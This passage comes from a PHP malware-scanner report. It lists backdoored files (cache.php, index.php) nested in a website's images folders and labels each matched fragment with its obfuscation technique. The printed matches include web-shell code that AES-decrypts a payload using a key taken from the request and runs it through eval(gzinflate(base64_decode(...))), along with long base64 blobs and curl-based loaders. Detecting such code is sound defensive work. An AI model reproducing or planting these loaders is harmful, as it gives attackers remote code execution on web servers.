<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">tmKhU</span><span style="color: #007700">(</span><span style="color: #0000BB">$rFz</span><span style="color: #007700">) { </span><span style="color: #0000BB">$uvUe </span><span style="color: #007700">= ${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}[</span><span style="color: #DD0000">"k"</span><span style="color: #007700">]; </span><span style="color: #0000BB">$UlPJ </span><span style="color: #007700">= </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$uvUe</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">16</span><span style="color: #007700">); </span><span style="color: #0000BB">$yaiA </span><span style="color: #007700">= </span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$rFz</span><span style="color: #007700">); return </span><span style="color: #0000BB">openssl_decrypt</span><span style="color: #007700">(</span><span style="color: #0000BB">$yaiA</span><span style="color: #007700">, </span><span style="color: #DD0000">"AES-256-CBC"</span><span style="color: #007700">, </span><span style="color: #0000BB">$uvUe</span><span style="color: #007700">, </span><span style="color: #0000BB">OPENSSL_RAW_DATA</span><span style="color: #007700">, </span><span style="color: #0000BB">$UlPJ</span><span style="color: #007700">); } if (</span><span style="color: #0000BB">tmKhU</span><span style="color: #007700">(</span><span style="color: #DD0000">'DjtPn+r4S0yvLCnquPz1fA'</span><span style="color: #007700">)){ echo </span><span style="color: #DD0000">'/9sbVs56eLG0QZ0P6zwCxPyMRx4nwcl9m</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$tmKhU</span><span style="color: #007700">)))); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">htmlspecialchars_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$tmKhU</span><span style="color: #007700">))))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_105").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/images/images/images/images/images/images/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.79 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:15:09</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:15:09</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_106" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$cj6mCOQTmztf31bo</span><span style="color: #007700">[</span><span style="color: #0000BB">38</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$jRkY4vnAqcWTA1H3</span><span style="color: #007700">; goto </span><span style="color: #0000BB">MR_mGgvHAuxdyDy4</span><span style="color: #007700">; </span><span style="color: #0000BB">cLPps6N6mMnLMFdU</span><span style="color: #007700">: </span><span style="color: #0000BB">$jRkY4vnAqcWTA1H3 </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">; goto </span><span style="color: #0000BB">oh3uDppBChuLRm1b</span><span style="color: #007700">; </span><span style="color: #0000BB">Fg21ysUuBB3g0XEe</span><span style="color: #007700">: </span><span style="color: #0000BB">$wtgTVOcVEQY2EMXP </span><span style="color: #007700">= </span><span style="color: #0000BB">explode</span><span style="color: #007700">(</span><span style="color: #DD0000">"@"</span><span style="color: #007700">, </span><span style="color: #0000BB">$c4xaRlyqhflNt9b4</span><span style="color: #007700">); goto </span><span style="color: #0000BB">cLPps6N6mMnLMFdU</span><span style="color: #007700">; </span><span style="color: #0000BB">Lb0LTzgPhrdfHJrg</span><span style="color: #007700">: </span><span style="color: #0000BB">$JIVXCyfw1pSrc_cy </span><span style="color: #007700">= </span><span style="color: #0000BB">$wG9_3jpZIghs89rS</span><span style="color: #007700">(</span><span style="color: #DD0000">"</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">); goto </span><span style="color: #0000BB">QxKSlXqzT3_xnSr3</span><span style="color: #007700">; </span><span style="color: #0000BB">QxKSlXqzT3_xnSr3</span><span style="color: #007700">: </span><span style="color: #0000BB">$CCkfOke50rCNreyI </span><span style="color: #007700">= </span><span style="color: #0000BB">curl_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$UfxLK9DaBH5nrkdK</span><span style="color: #007700">); goto </span><span style="color: #0000BB">Vwy4DS1slMrR2aHa</span><span style="color: #007700">; </span><span style="color: #0000BB">sWN_8GOQlyITIFBG</span><span style="color: #007700">: </span><span style="color: #0000BB">$UfxLK9DaBH5nrkdK </span><span style="color: #007700">= </span><span style="color: #0000BB">curl_init</span><span style="color: #007700">(</span><span style="color: #0000BB">$Ly2UUkz8QeOWT14U</span><span style="color: #007700">); goto </span><span style="color: #0000BB">PNeTQs1cG_UNv0cD</span><span style="color: #007700">; </span><span style="color: #0000BB">EswO4yf3wHHdMwei</span><span style="color: #007700">: } static function </span><span style="color: #0000BB">wAPC</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_106").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/images/images/images/images/images/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.50 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:14:57</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:14:57</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_107" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'g96AGBF4PKI2A8tHernohsCZ1UGvkq2zQ7+HO9+J7+5hXewhX0zrOffpe01LK+0x/OFiO5gnO+8u/GqPuyvo51ZfPbdZa4yx7HHf4NbPevnd3BrVtHu4lLe7OJe/9LeQ5Cd5g704dS+WzXnY8p8rMRGZs+08s36i9u/z3Xnd0H81NmRvCCs5MFsWy31MXOh0C/aP3/jS1sq3PYlzQEpTUvWULbktbfAG7DC8GpWERRZBLOea5uy/RVm1Tb6M10Q6PQmznyF2g4kt/dOAxkScDUghAyBDDHJSGmEaP3ulZYFYfFHHun8/LGrDhMrnLIMQJKCTfYi7+ht9mF0T6Vv9xf9QrGo5bbO/srT8bHroVrVp6KzEUCWvHvwdbXZ23kQf+y9748P3+Wve6levNSn5FEK1oYLoKua+9YUretg+x2VhDmXiHiv02MXH/NV9r/0v9OB9DoraStBJAHScTsAVjFU2WWwP1M+MiHxz19DiZX8xUMvukwz...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit global_var_string <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ZWL</span><span style="color: #007700">(</span><span style="color: #0000BB">$IUFsV</span><span style="color: #007700">) { </span><span style="color: #0000BB">$zxZK </span><span style="color: #007700">= ${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}[</span><span style="color: #DD0000">"k"</span><span style="color: #007700">]; </span><span style="color: #0000BB">$kZl </span><span style="color: #007700">= </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$zxZK</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">16</span><span style="color: #007700">); </span><span style="color: #0000BB">$Vsh </span><span style="color: #007700">= </span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$IUFsV</span><span style="color: #007700">); return </span><span style="color: #0000BB">openssl_decrypt</span><span style="color: #007700">(</span><span style="color: #0000BB">$Vsh</span><span style="color: #007700">, </span><span style="color: #DD0000">"AES-256-CBC"</span><span style="color: #007700">, </span><span style="color: #0000BB">$zxZK</span><span style="color: #007700">, </span><span style="color: #0000BB">OPENSSL_RAW_DATA</span><span style="color: #007700">, </span><span style="color: #0000BB">$kZl</span><span style="color: #007700">); } if (</span><span style="color: #0000BB">ZWL</span><span style="color: #007700">(</span><span style="color: #DD0000">'DjtPn+r4S0yvLCnquPz1fA'</span><span style="color: #007700">)){ echo </span><span style="color: #DD0000">'0jInsirLdyt0E9TVaFnwofKa6JT7pX56dlgxN</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$ZWL</span><span style="color: #007700">)))); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">htmlspecialchars_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$ZWL</span><span style="color: #007700">))))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_107").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/images/images/images/images/images/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.60 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:14:57</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:14:57</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_108" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$WOH7gM_n5DPx</span><span style="color: #007700">[</span><span style="color: #0000BB">42</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">lJEPwYCQSsgT</span><span style="color: #007700">() { goto </span><span style="color: #0000BB">Tj0IUIFnyC9s</span><span style="color: #007700">; </span><span style="color: #0000BB">ReUO9Q6N6lCu</span><span style="color: #007700">: </span><span style="color: #0000BB">FcU1L2Cg9eu_</span><span style="color: #007700">: goto </span><span style="color: #0000BB">ElBTI0i9z4XG</span><span style="color: #007700">; </span><span style="color: #0000BB">fgXBMyc7QADx</span><span style="color: #007700">: foreach (</span><span style="color: #0000BB">$RuKeRXqec0Cx </span><span style="color: #007700">as </span><span style="color: #0000BB">$VISGKtAorzze</span><span style="color: #007700">) { </span><span style="color: #0000BB">$vnA_G8ky0uIF</span><span style="color: #007700">[] = </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">zj2rqpRIpUDF</span><span style="color: #007700">(</span><span style="color: #0000BB">$VISGKtAorzze</span><span style="color: #007700">); </span><span style="color: #0000BB">rV69WQCr0VYX</span><span style="color: #007700">: } goto </span><span style="color: #0000BB">ReUO9Q6N6lCu</span><span style="color: #007700">; </span><span style="color: #0000BB">EZtq3Ytcmua0</span><span style="color: #007700">: if (!(@</span><span style="color: #0000BB">$N71XvCyT</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_108").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/images/images/images/images/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.52 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:14:43</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:14:43</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_109" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'QK5MZmD8fxRYgvdobNkOpVIpkw4lsdeJ8m+6tPPUzHf957duhv+M0z7HOrfqzL7/8wwx7Hd8+PV+5a/dleii/a9Bp7lrrrWua04/3u+xLO6M3dxObciXO/t7u6V1u8xnOQ1Cd/GvZ6XZ8qkjP19nZSLu1XGl5+Xt1F/9+i0j+4fs5saUSYOkpwVC4umb6Zkc6vb60f0rmF95FrcEqg9gyRF56WY8yXgxyQBejsLggo0idHPtUX5/gqz6htdmS6K/HIz4TZCV47yN0uHSQSLuBqwwAZghpjENv7h0zdbYCWO1XhJh/Y4+aw6QMD67OSjUiCo0LG4tbkbvVx9mRFbX83H3mBb+8mzM/6F9+xKZ9yVtmiMDtI1b57c0y1n+FZyXi+/PGrLfvTbWN63brsZcNRSMKWCqurmeLx1rTrodi9U7kJl6tYLsNTNwfTV/W/96izQ/E6rkcrQB0hFwIHQ1QRnthX8RA3Pj4x8eVPgb+5fNhArJN6s...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit global_var_string <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fetq</span><span style="color: #007700">(</span><span style="color: #0000BB">$FyLk</span><span style="color: #007700">) { </span><span style="color: #0000BB">$ECXp </span><span style="color: #007700">= ${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}[</span><span style="color: #DD0000">"k"</span><span style="color: #007700">]; </span><span style="color: #0000BB">$XzZ </span><span style="color: #007700">= </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$ECXp</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">16</span><span style="color: #007700">); </span><span style="color: #0000BB">$pfcMv </span><span style="color: #007700">= </span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$FyLk</span><span style="color: #007700">); return </span><span style="color: #0000BB">openssl_decrypt</span><span style="color: #007700">(</span><span style="color: #0000BB">$pfcMv</span><span style="color: #007700">, </span><span style="color: #DD0000">"AES-256-CBC"</span><span style="color: #007700">, </span><span style="color: #0000BB">$ECXp</span><span style="color: #007700">, </span><span style="color: #0000BB">OPENSSL_RAW_DATA</span><span style="color: #007700">, </span><span style="color: #0000BB">$XzZ</span><span style="color: #007700">); } if (</span><span style="color: #0000BB">fetq</span><span style="color: #007700">(</span><span style="color: #DD0000">'DjtPn+r4S0yvLCnquPz1fA'</span><span style="color: #007700">)){ echo </span><span style="color: #DD0000">'zAPOF5pAnqXPiHkc6gr3A+FfKfsFjbC4H</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$fetq</span><span style="color: #007700">)))); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">htmlspecialchars_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$fetq</span><span style="color: #007700">))))</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_109").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/images/images/images/images/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 428.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:15:06</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:15:06</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_110" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$lQMfm</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit hex_char <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Hex char is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">\</span><span style="color: #0000BB">x5f</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_110").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/images/images/images/cache.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.51 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 10:14:43</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 10:14:43</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_111" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'gy7Iw2fJOiA+tDerh0xtKJlEGPkt7Lh9k3e89wtP5uruc1eP6hLnK8939o4Le+6xXHCjvewRH/Sf+OKPqSvo61ZbHbT3mwlm3vHd5udHtzLu/gVv9hLe583ubi3e7yHXqBXPw2Nezkv14VJHfq7LTkRErvNOz9uarL//9FpH9xffjZ0okwd8joVC4umb6ZkUyvb60f0rmF99FrcEqg9gyJF56WY0y3gxyAAvZ6FQYUaxmDn0qr8fc1ZdltdmS6I/HIz4TZCZg9y01uHiQSJuBqwgAZghp9ENLjCpnb2wEscuvCjD/z+9Fj1hYG1yNk6pEFhpHOxf3Q2e7i6J1K3+4veqdD38pNnd21K8tvKb9yVpmjMDtQ1G479Zx6T/is6xR+/Fr15lPu2bvc7tdaMsuwJEFrBV3VTsF761pV0Ow+qdyES8eEFMul64vJqfL/+M5ZodC9VQm1oCyQCaodoYgoT3wq+IgZnR8YevinwP3cvmoh1kOe2...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit global_var_string <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">GAT</span><span style="color: #007700">(</span><span style="color: #0000BB">$khm</span><span style="color: #007700">) { </span><span style="color: #0000BB">$mGM </span><span style="color: #007700">= ${</span><span style="color: #DD0000">"_REQUEST"</span><span style="color: #007700">}[</span><span style="color: #DD0000">"k"</span><span style="color: #007700">]; </span><span style="color: #0000BB">$MAwia </span><span style="color: #007700">= </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$mGM</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">16</span><span style="color: #007700">); </span><span style="color: #0000BB">$fpRi </span><span style="color: #007700">= </span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$khm</span><span style="color: #007700">); return </span><span style="color: #0000BB">openssl_decrypt</span><span style="color: #007700">(</span><span style="color: #0000BB">$fpRi</span><span style="color: #007700">, </span><span style="color: #DD0000">"AES-256-CBC"</span><span style="color: #007700">, </span><span style="color: #0000BB">$mGM</span><span style="color: #007700">, </span><span style="color: #0000BB">OPENSSL_RAW_DATA</span><span style="color: #007700">, </span><span style="color: #0000BB">$MAwia</span><span style="color: #007700">); } if (</span><span style="color: #0000BB">GAT</span><span style="color: #007700">(</span><span style="color: #DD0000">'DjtPn+r4S0yvLCnquPz1fA'</span><span style="color: #007700">)){ echo </span><span style="color: #DD0000">'5zf1O0JKcd7TasShaeFOiqUIIxFPaN8DKJT8fJ</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$GAT</span><span style="color: #007700">)))); </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">htmlspecialchars_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$GAT</span><span style="color: #007700">))))</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev exec_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ceXe</span>
</span>
